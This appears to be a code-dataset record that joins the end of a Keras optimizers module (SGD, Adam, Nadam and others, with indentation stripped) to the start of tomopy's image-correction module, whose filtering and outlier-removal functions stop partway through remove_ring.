moments = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + moments
for p, g, m in zip(params, grads, moments):
v = self.momentum * m - lr * g
self.updates.append(state_ops.assign(m, v))
if self.nesterov:
new_p = p + self.momentum * v - lr * g
else:
new_p = p + v
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'momentum': float(K.get_value(self.momentum)),
'decay': float(K.get_value(self.decay)),
'nesterov': self.nesterov
}
base_config = super(SGD, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class RMSprop(Optimizer):
def __init__(self, lr=0.001, rho=0.9, epsilon=None, decay=0., **kwargs):
super(RMSprop, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.rho = K.variable(rho, name='rho')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
accumulators = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': float(K.get_value(self.rho)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(RMSprop, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adagrad(Optimizer):
def __init__(self, lr=0.01, epsilon=None, decay=0., **kwargs):
super(Adagrad, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
new_a = a + math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adagrad, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adadelta(Optimizer):
def __init__(self, lr=1.0, rho=0.95, epsilon=None, decay=0., **kwargs):
super(Adadelta, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.rho = rho
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
delta_accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators + delta_accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a, d_a in zip(params, grads, accumulators, delta_accumulators):
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
update = g * K.sqrt(d_a + self.epsilon) / K.sqrt(new_a + self.epsilon)
new_p = p - lr * update
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
new_d_a = self.rho * d_a + (1 - self.rho) * math_ops.square(update)
self.updates.append(state_ops.assign(d_a, new_d_a))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': self.rho,
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adadelta, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adam(Optimizer):
def __init__(self,
lr=0.001,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
amsgrad=False,
**kwargs):
super(Adam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
self.amsgrad = amsgrad
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr * (
K.sqrt(1. - math_ops.pow(self.beta_2, t)) /
(1. - math_ops.pow(self.beta_1, t)))
ms = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
vs = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
if self.amsgrad:
vhats = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
else:
vhats = [K.zeros(1) for _ in params]
self.weights = [self.iterations] + ms + vs + vhats
for p, g, m, v, vhat in zip(params, grads, ms, vs, vhats):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
v_t = (self.beta_2 * v) + (1. - self.beta_2) * math_ops.square(g)
if self.amsgrad:
vhat_t = math_ops.maximum(vhat, v_t)
p_t = p - lr_t * m_t / (K.sqrt(vhat_t) + self.epsilon)
self.updates.append(state_ops.assign(vhat, vhat_t))
else:
p_t = p - lr_t * m_t / (K.sqrt(v_t) + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
new_p = p_t
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon,
'amsgrad': self.amsgrad
}
base_config = super(Adam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adamax(Optimizer):
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
**kwargs):
super(Adamax, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr / (1. - math_ops.pow(self.beta_1, t))
shapes = [K.int_shape(p) for p in params]
ms = [K.zeros(shape) for shape in shapes]
us = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + ms + us
for p, g, m, u in zip(params, grads, ms, us):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
u_t = math_ops.maximum(self.beta_2 * u, math_ops.abs(g))
p_t = p - lr_t * m_t / (u_t + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(u, u_t))
new_p = p_t
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adamax, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Nadam(Optimizer):
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
schedule_decay=0.004,
**kwargs):
super(Nadam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.m_schedule = K.variable(1., name='m_schedule')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.schedule_decay = schedule_decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
momentum_cache_t = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), t * self.schedule_decay)))
momentum_cache_t_1 = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), (t + 1) * self.schedule_decay)))
m_schedule_new = self.m_schedule * momentum_cache_t
m_schedule_next = self.m_schedule * momentum_cache_t * momentum_cache_t_1
self.updates.append((self.m_schedule, m_schedule_new))
shapes = [K.int_shape(p) for p in params]
ms = [K.zeros(shape) for shape in shapes]
vs = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations, self.m_schedule] + ms + vs
for p, g, m, v in zip(params, grads, ms, vs):
g_prime = g / (1. - m_schedule_new)
m_t = self.beta_1 * m + (1. - self.beta_1) * g
m_t_prime = m_t / (1. - m_schedule_next)
v_t = self.beta_2 * v + (1. - self.beta_2) * math_ops.square(g)
v_t_prime = v_t / (1. - math_ops.pow(self.beta_2, t))
m_t_bar = (1. -
momentum_cache_t) * g_prime + momentum_cache_t_1 * m_t_prime
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
p_t = p - self.lr * m_t_bar / (K.sqrt(v_t_prime) + self.epsilon)
new_p = p_t
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'epsilon': self.epsilon,
'schedule_decay': self.schedule_decay
}
base_config = super(Nadam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class TFOptimizer(Optimizer, trackable.Trackable):
def __init__(self, optimizer, iterations=None):
self.optimizer = optimizer
self._track_trackable(optimizer, name='optimizer')
if iterations is None:
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
else:
self.iterations = iterations
self._track_trackable(self.iterations, name='global_step')
def apply_gradients(self, grads):
self.optimizer.apply_gradients(grads, global_step=self.iterations)
def get_grads(self, loss, params):
return self.optimizer.compute_gradients(loss, params)
def get_updates(self, loss, params):
if distribution_strategy_context.has_strategy():
self.updates = []
if not params:
grads = self.optimizer.compute_gradients(loss)
else:
grads = self.optimizer.compute_gradients(loss, params)
global_step = training_util.get_global_step()
opt_update = self.optimizer.apply_gradients(grads, global_step)
else:
if not params:
self.updates = [state_ops.assign_add(self.iterations, 1)]
return self.updates
self.updates = []
grads = self.optimizer.compute_gradients(loss, params)
opt_update = self.optimizer.apply_gradients(
grads, global_step=self.iterations)
self.updates.append(opt_update)
return self.updates
@property
def weights(self):
raise NotImplementedError
def get_config(self):
raise NotImplementedError
def from_config(self, config):
raise NotImplementedError
sgd = SGD
rmsprop = RMSprop
adagrad = Adagrad
adadelta = Adadelta
adam = Adam
adamax = Adamax
nadam = Nadam
@keras_export('keras.optimizers.serialize')
def serialize(optimizer):
return serialize_keras_object(optimizer)
@keras_export('keras.optimizers.deserialize')
def deserialize(config, custom_objects=None):
from tensorflow.python.keras.mixed_precision.experimental import loss_scale_optimizer
all_classes = {
'adadelta': adadelta_v2.Adadelta,
'adagrad': adagrad_v2.Adagrad,
'adam': adam_v2.Adam,
'adamax': adamax_v2.Adamax,
'nadam': nadam_v2.Nadam,
'rmsprop': rmsprop_v2.RMSprop,
'sgd': gradient_descent_v2.SGD,
'ftrl': ftrl.Ftrl,
'lossscaleoptimizer': loss_scale_optimizer.LossScaleOptimizer,
}
if config['class_name'].lower() in all_classes:
config['class_name'] = config['class_name'].lower()
return deserialize_keras_object(
config,
module_objects=all_classes,
custom_objects=custom_objects,
printable_module_name='optimizer')
@keras_export('keras.optimizers.get')
def get(identifier):
if isinstance(identifier, (Optimizer, optimizer_v2.OptimizerV2)):
return identifier
elif isinstance(identifier, tf_optimizer_module.Optimizer):
opt = TFOptimizer(identifier)
K.track_tf_optimizer(opt)
return opt
elif isinstance(identifier, dict):
return deserialize(identifier)
elif isinstance(identifier, six.string_types):
config = {'class_name': str(identifier), 'config': {}}
return deserialize(config)
else:
raise ValueError('Could not interpret optimizer identifier:', identifier)
| true
| true
|
1c3eaf2c8d84487059c56d624eb2eba5474de60c
| 26,113
|
py
|
Python
|
source/tomopy/misc/corr.py
|
WilliamJudge94/tomopy
|
301ee367d18ca6d18f2b9b18e2c531c33d4739e4
|
[
"BSD-3-Clause"
] | null | null | null |
source/tomopy/misc/corr.py
|
WilliamJudge94/tomopy
|
301ee367d18ca6d18f2b9b18e2c531c33d4739e4
|
[
"BSD-3-Clause"
] | null | null | null |
source/tomopy/misc/corr.py
|
WilliamJudge94/tomopy
|
301ee367d18ca6d18f2b9b18e2c531c33d4739e4
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# #########################################################################
# Copyright (c) 2015-2019, UChicago Argonne, LLC. All rights reserved. #
# #
# Copyright 2015-2019. UChicago Argonne, LLC. This software was produced #
# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #
# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #
# U.S. Department of Energy. The U.S. Government has rights to use, #
# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #
# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #
# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #
# modified to produce derivative works, such modified software should #
# be clearly marked, so as not to confuse it with the version available #
# from ANL. #
# #
# Additionally, redistribution and use in source and binary forms, with #
# or without modification, are permitted provided that the following #
# conditions are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of UChicago Argonne, LLC, Argonne National #
# Laboratory, ANL, the U.S. Government, nor the names of its #
# contributors may be used to endorse or promote products derived #
# from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #
# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
# #########################################################################
"""
Module for data correction and masking functions.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
from scipy.ndimage import filters
import tomopy.util.mproc as mproc
import tomopy.util.dtype as dtype
import tomopy.util.extern as extern
import logging
import warnings
import numexpr as ne
import concurrent.futures as cf
from scipy.signal import medfilt2d
logger = logging.getLogger(__name__)
__author__ = "Doga Gursoy, William Judge"
__credits__ = "Mark Rivers, Xianghui Xiao"
__copyright__ = "Copyright (c) 2015, UChicago Argonne, LLC."
__docformat__ = 'restructuredtext en'
__all__ = [
'adjust_range',
'circ_mask',
'gaussian_filter',
'median_filter',
'median_filter_cuda',
'median_filter_nonfinite',
'sobel_filter',
'remove_nan',
'remove_neg',
'remove_outlier',
'remove_outlier1d',
'remove_outlier_cuda',
'remove_ring',
'enhance_projs_aps_1id',
]
def adjust_range(arr, dmin=None, dmax=None):
"""
Change dynamic range of values in an array.
Parameters
----------
arr : ndarray
Input array.
dmin, dmax : float, optional
Mininum and maximum values to rescale data.
Returns
-------
ndarray
Output array.
"""
if dmax is None:
dmax = np.max(arr)
if dmin is None:
dmin = np.min(arr)
if dmax < np.max(arr):
arr[arr > dmax] = dmax
if dmin > np.min(arr):
arr[arr < dmin] = dmin
return arr
def gaussian_filter(arr, sigma=3, order=0, axis=0, ncore=None):
"""
Apply Gaussian filter to 3D array along specified axis.
Parameters
----------
arr : ndarray
Input array.
sigma : scalar or sequence of scalars
Standard deviation for Gaussian kernel. The standard deviations
of the Gaussian filter are given for each axis as a sequence, or
as a single number, in which case it is equal for all axes.
order : {0, 1, 2, 3} or sequence from same set, optional
Order of the filter along each axis is given as a sequence
of integers, or as a single number. An order of 0 corresponds
to convolution with a Gaussian kernel. An order of 1, 2, or 3
corresponds to convolution with the first, second or third
derivatives of a Gaussian. Higher order derivatives are not
implemented
axis : int, optional
Axis along which median filtering is performed.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
3D array of same shape as input.
"""
arr = dtype.as_float32(arr)
out = np.empty_like(arr)
if ncore is None:
ncore = mproc.mp.cpu_count()
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(arr.shape[axis]):
slc[axis] = i
e.submit(filters.gaussian_filter,
arr[tuple(slc)],
sigma,
order=order,
output=out[tuple(slc)])
return out
def median_filter(arr, size=3, axis=0, ncore=None):
"""
Apply median filter to 3D array along specified axis.
Parameters
----------
arr : ndarray
Input array.
size : int, optional
The size of the filter.
axis : int, optional
Axis along which median filtering is performed.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
Median filtered 3D array.
"""
arr = dtype.as_float32(arr)
out = np.empty_like(arr)
if ncore is None:
ncore = mproc.mp.cpu_count()
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(arr.shape[axis]):
slc[axis] = i
e.submit(filters.median_filter,
arr[tuple(slc)],
size=(size, size),
output=out[tuple(slc)])
return out
def median_filter_cuda(arr, size=3, axis=0):
"""
Apply median filter to 3D array along 0 axis with GPU support.
The winAllow is for A6000, Tian X support 3 to 8
Parameters
----------
arr : ndarray
Input array.
size : int, optional
The size of the filter.
axis : int, optional
Axis along which median filtering is performed.
Returns
-------
ndarray
Median filtered 3D array.
Example
-------
import tomocuda
tomocuda.remove_outlier_cuda(arr, dif, 5)
For more information regarding install and using tomocuda, check
https://github.com/kyuepublic/tomocuda for more information
"""
try:
import tomocuda
winAllow = range(2, 16)
if (axis != 0):
arr = np.swapaxes(arr, 0, axis)
if size in winAllow:
loffset = int(size / 2)
roffset = int((size - 1) / 2)
prjsize = arr.shape[0]
imsizex = arr.shape[2]
imsizey = arr.shape[1]
filter = tomocuda.mFilter(imsizex, imsizey, prjsize, size)
out = np.zeros(shape=(prjsize, imsizey, imsizex), dtype=np.float32)
for step in range(prjsize):
# im_noisecu = arr[:][step][:].astype(np.float32)
im_noisecu = arr[step].astype(np.float32)
im_noisecu = np.lib.pad(im_noisecu, ((loffset, roffset),
(loffset, roffset)),
'symmetric')
im_noisecu = im_noisecu.flatten()
filter.setCuImage(im_noisecu)
filter.run2DFilter(size)
results = filter.retreive()
results = results.reshape(imsizey, imsizex)
out[step] = results
if (axis != 0):
out = np.swapaxes(out, 0, axis)
else:
warnings.warn("Window size not support, using cpu median filter")
out = median_filter(arr, size, axis)
except ImportError:
warnings.warn("The tomocuda is not support, using cpu median filter")
out = median_filter(arr, size, axis)
return out
def median_filter_nonfinite(arr, size=3, callback=None):
"""
Remove nonfinite values from a 3D array using an in-place 2D median filter.
The 2D selective median filter is applied along the last two axes of
the array.
.. versionadded:: 1.11
Parameters
----------
arr : ndarray
The 3D array with nonfinite values in it.
size : int, optional
The size of the filter.
callback : func(total, description, unit)
A function called after every internal loop iteration.
total is number of loop iterations.
description is 'Nonfinite median filter'.
unit is ' prjs'.
Returns
-------
ndarray
The corrected 3D array with all nonfinite values removed based upon the
local median value defined by the kernel size.
Raises
------
ValueError
If the filter comes across a kernel only containing non-finite values a
ValueError is raised for the user to increase their kernel size.
"""
# Defining a callback function if None is provided
if callback is None:
def callback(total, description, unit):
pass
# Iterating throug each projection to save on RAM
for projection in arr:
nonfinite_idx = np.nonzero(~np.isfinite(projection))
projection_copy = projection.copy()
# Iterating through each bad value and replace it with finite median
for x_idx, y_idx in zip(*nonfinite_idx):
# Determining the lower and upper bounds for kernel
x_lower = max(0, x_idx - (size // 2))
x_higher = min(arr.shape[1], x_idx + (size // 2) + 1)
y_lower = max(0, y_idx - (size // 2))
y_higher = min(arr.shape[2], y_idx + (size // 2) + 1)
# Extracting kernel data and fining finite median
kernel_cropped_arr = projection_copy[x_lower:x_higher,
y_lower:y_higher]
if len(kernel_cropped_arr[np.isfinite(kernel_cropped_arr)]) == 0:
raise ValueError(
"Found kernel containing only non-finite values.\
Please increase kernel size")
median_corrected_arr = np.median(
kernel_cropped_arr[np.isfinite(kernel_cropped_arr)])
# Replacing bad data with finite median
projection[x_idx, y_idx] = median_corrected_arr
callback(arr.shape[0], 'Nonfinite median filter', ' prjs')
return arr
def sobel_filter(arr, axis=0, ncore=None):
"""
Apply Sobel filter to 3D array along specified axis.
Parameters
----------
arr : ndarray
Input array.
axis : int, optional
Axis along which sobel filtering is performed.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
3D array of same shape as input.
"""
arr = dtype.as_float32(arr)
out = np.empty_like(arr)
if ncore is None:
ncore = mproc.mp.cpu_count()
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(arr.shape[axis]):
slc[axis] = i
e.submit(filters.sobel, arr[slc], output=out[slc])
return out
def remove_nan(arr, val=0., ncore=None):
"""
Replace NaN values in array with a given value.
Parameters
----------
arr : ndarray
Input array.
val : float, optional
Values to be replaced with NaN values in array.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
Corrected array.
"""
arr = dtype.as_float32(arr)
val = np.float32(val)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(arr!=arr, val, arr)', out=arr)
return arr
def remove_neg(arr, val=0., ncore=None):
"""
Replace negative values in array with a given value.
Parameters
----------
arr : ndarray
Input array.
val : float, optional
Values to be replaced with negative values in array.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
Corrected array.
"""
arr = dtype.as_float32(arr)
val = np.float32(val)
with mproc.set_numexpr_threads(ncore):
ne.evaluate('where(arr<0, val, arr)', out=arr)
return arr
def remove_outlier(arr, dif, size=3, axis=0, ncore=None, out=None):
"""
Remove high intensity bright spots from a N-dimensional array by chunking
along the specified dimension, and performing (N-1)-dimensional median
filtering along the other dimensions.
Parameters
----------
arr : ndarray
Input array.
dif : float
Expected difference value between outlier value and
the median value of the array.
size : int
Size of the median filter.
axis : int, optional
Axis along which to chunk.
ncore : int, optional
Number of cores that will be assigned to jobs.
out : ndarray, optional
Output array for result. If same as arr, process
will be done in-place.
Returns
-------
ndarray
Corrected array.
"""
tmp = np.empty_like(arr)
ncore, chnk_slices = mproc.get_ncore_slices(arr.shape[axis], ncore=ncore)
filt_size = [size] * arr.ndim
filt_size[axis] = 1
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(ncore):
slc[axis] = chnk_slices[i]
e.submit(filters.median_filter,
arr[tuple(slc)],
size=filt_size,
output=tmp[tuple(slc)])
arr = dtype.as_float32(arr)
tmp = dtype.as_float32(tmp)
dif = np.float32(dif)
with mproc.set_numexpr_threads(ncore):
out = ne.evaluate('where(arr-tmp>=dif,tmp,arr)', out=out)
return out
def remove_outlier1d(arr, dif, size=3, axis=0, ncore=None, out=None):
"""
Remove high intensity bright spots from an array, using a one-dimensional
median filter along the specified axis.
Parameters
----------
arr : ndarray
Input array.
dif : float
Expected difference value between outlier value and
the median value of the array.
size : int
Size of the median filter.
axis : int, optional
Axis along which median filtering is performed.
ncore : int, optional
Number of cores that will be assigned to jobs.
out : ndarray, optional
Output array for result. If same as arr, process
will be done in-place.
Returns
-------
ndarray
Corrected array.
"""
arr = dtype.as_float32(arr)
dif = np.float32(dif)
tmp = np.empty_like(arr)
other_axes = [i for i in range(arr.ndim) if i != axis]
largest = np.argmax([arr.shape[i] for i in other_axes])
lar_axis = other_axes[largest]
ncore, chnk_slices = mproc.get_ncore_slices(arr.shape[lar_axis],
ncore=ncore)
filt_size = [1] * arr.ndim
filt_size[axis] = size
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(ncore):
slc[lar_axis] = chnk_slices[i]
e.submit(filters.median_filter,
arr[slc],
size=filt_size,
output=tmp[slc],
mode='mirror')
with mproc.set_numexpr_threads(ncore):
out = ne.evaluate('where(arr-tmp>=dif,tmp,arr)', out=out)
return out
def remove_outlier_cuda(arr, dif, size=3, axis=0):
"""
Remove high intensity bright spots from a 3D array along axis 0
dimension using GPU.
Parameters
----------
arr : ndarray
Input array.
dif : float
Expected difference value between outlier value and
the median value of the array.
size : int
Size of the median filter.
axis : int, optional
Axis along which outlier removal is performed.
Returns
-------
ndarray
Corrected array.
Example
-------
>>> import tomocuda
>>> tomocuda.remove_outlier_cuda(arr, dif, 5)
For more information regarding install and using tomocuda, check
https://github.com/kyuepublic/tomocuda for more information
"""
arr = dtype.as_float32(arr)
dif = np.float32(dif)
try:
import tomocuda
winAllow = range(2, 16)
if (axis != 0):
arr = np.swapaxes(arr, 0, axis)
if size in winAllow:
prjsize = arr.shape[0]
loffset = int(size / 2)
roffset = int((size - 1) / 2)
imsizex = arr.shape[2]
imsizey = arr.shape[1]
filter = tomocuda.mFilter(imsizex, imsizey, prjsize, size)
out = np.zeros(shape=(prjsize, imsizey, imsizex), dtype=np.float32)
for step in range(prjsize):
im_noisecu = arr[step].astype(np.float32)
im_noisecu = np.lib.pad(im_noisecu, ((loffset, roffset),
(loffset, roffset)),
'symmetric')
im_noisecu = im_noisecu.flatten()
filter.setCuImage(im_noisecu)
filter.run2DRemoveOutliner(size, dif)
results = filter.retreive()
results = results.reshape(imsizey, imsizex)
out[step] = results
if (axis != 0):
out = np.swapaxes(out, 0, axis)
else:
warnings.warn("Window size not support, using cpu outlier removal")
out = remove_outlier(arr, dif, size)
except ImportError:
warnings.warn("The tomocuda is not support, using cpu outlier removal")
out = remove_outlier(arr, dif, size)
return out
def remove_ring(rec,
center_x=None,
center_y=None,
thresh=300.0,
thresh_max=300.0,
thresh_min=-100.0,
theta_min=30,
rwidth=30,
int_mode='WRAP',
ncore=None,
nchunk=None,
out=None):
"""
Remove ring artifacts from images in the reconstructed domain.
Descriptions of parameters need to be more clear for sure.
Parameters
----------
arr : ndarray
Array of reconstruction data
center_x : float, optional
abscissa location of center of rotation
center_y : float, optional
ordinate location of center of rotation
thresh : float, optional
maximum value of an offset due to a ring artifact
thresh_max : float, optional
max value for portion of image to filter
thresh_min : float, optional
min value for portion of image to filer
theta_min : int, optional
Features larger than twice this angle (degrees) will be considered
a ring artifact. Must be less than 180 degrees.
rwidth : int, optional
Maximum width of the rings to be filtered in pixels
int_mode : str, optional
'WRAP' for wrapping at 0 and 360 degrees, 'REFLECT' for reflective
boundaries at 0 and 180 degrees.
ncore : int, optional
Number of cores that will be assigned to jobs.
nchunk : int, optional
Chunk size for each core.
out : ndarray, optional
Output array for result. If same as arr, process
will be done in-place.
Returns
-------
ndarray
Corrected reconstruction data
"""
rec = dtype.as_float32(rec)
if out is None:
out = rec.copy()
else:
out = dtype.as_float32(out)
dz, dy, dx = rec.shape
if center_x is None:
center_x = (dx - 1.0) / 2.0
if center_y is None:
center_y = (dy - 1.0) / 2.0
if int_mode.lower() == 'wrap':
int_mode = 0
